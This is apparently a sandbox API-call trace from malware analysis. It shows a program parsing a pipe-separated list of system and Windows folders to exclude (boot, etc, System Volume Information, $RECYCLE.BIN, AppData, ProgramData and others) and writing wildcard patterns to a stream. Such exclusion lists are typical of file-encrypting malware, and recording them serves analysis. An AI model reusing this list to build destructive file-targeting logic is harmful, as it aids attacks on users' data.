ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4108*=0x43, cb=0x2c, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a4108 | out: hHeap=0x580000) returned 1 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] StrChrW (lpStart="bin|Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.038] lstrlenW (lpString="bin") returned 3 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4700*=0x62, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] StrChrW (lpStart="Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.038] lstrlenW (lpString="Boot") returned 4 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4708*=0x42, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] StrChrW (lpStart="boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.038] lstrlenW (lpString="boot") returned 4 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4712*=0x62, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] StrChrW (lpStart="dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.038] lstrlenW (lpString="dev") returned 3 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a471c*=0x64, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.038] StrChrW (lpStart="etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.039] lstrlenW (lpString="etc") returned 3 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4724*=0x65, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] StrChrW (lpStart="lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.039] lstrlenW (lpString="lib") returned 3 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a472c*=0x6c, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] StrChrW (lpStart="initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.039] lstrlenW (lpString="initdr") returned 6 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4734*=0x69, cb=0xc, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] StrChrW (lpStart="sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.039] lstrlenW (lpString="sbin") returned 4 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4742*=0x73, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] StrChrW (lpStart="sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.039] lstrlenW (lpString="sys") returned 3 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a474c*=0x73, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.039] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] StrChrW (lpStart="vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.040] lstrlenW (lpString="vmlinuz") returned 7 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4754*=0x76, cb=0xe, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] StrChrW (lpStart="run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.040] lstrlenW (lpString="run") returned 3 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4764*=0x72, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] StrChrW (lpStart="var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.040] lstrlenW (lpString="var") returned 3 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a476c*=0x76, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] StrChrW (lpStart="\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.040] lstrlenW (lpString="\\Boot") returned 5 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4774*=0x5c, cb=0xa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] StrChrW (lpStart="System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.040] lstrlenW (lpString="System Volume Information") returned 25 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.040] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4780*=0x53, cb=0x32, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] StrChrW (lpStart="$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.041] lstrlenW (lpString="$RECYCLE.BIN") returned 12 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a47b4*=0x24, cb=0x18, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] StrChrW (lpStart="WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.041] lstrlenW (lpString="WebCache") returned 8 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a47ce*=0x57, cb=0x10, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] StrChrW (lpStart="Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0066.041] lstrlenW (lpString="Caches") returned 6 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a47e0*=0x43, cb=0xc, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] StrChrW (lpStart="WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|AppData|ProgramData|\\Users\\All Users" [0066.041] lstrlenW (lpString="WindowsApps") returned 11 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a47ee*=0x57, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.041] StrChrW (lpStart="AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|ProgramData|\\Users\\All Users" [0066.041] lstrlenW (lpString="AppData") returned 7 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4806*=0x41, cb=0xe, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] StrChrW (lpStart="ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|\\Users\\All Users" [0066.042] lstrlenW (lpString="ProgramData") returned 11 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a4816*=0x50, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] StrChrW (lpStart="\\Users\\All Users", wMatch=0x7c) returned 0x0 [0066.042] lstrlenW (lpString="\\Users\\All Users") returned 16 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0x5a482e*=0x5c, cb=0x20, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] ISequentialStream:RemoteWrite (in: This=0x59df80, pv=0xf9fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0066.042] IStream:Stat (in: This=0x59df80, pstatstg=0xf9fe38, grfStatFlag=0x1 | out: pstatstg=0xf9fe38) returned 0x0 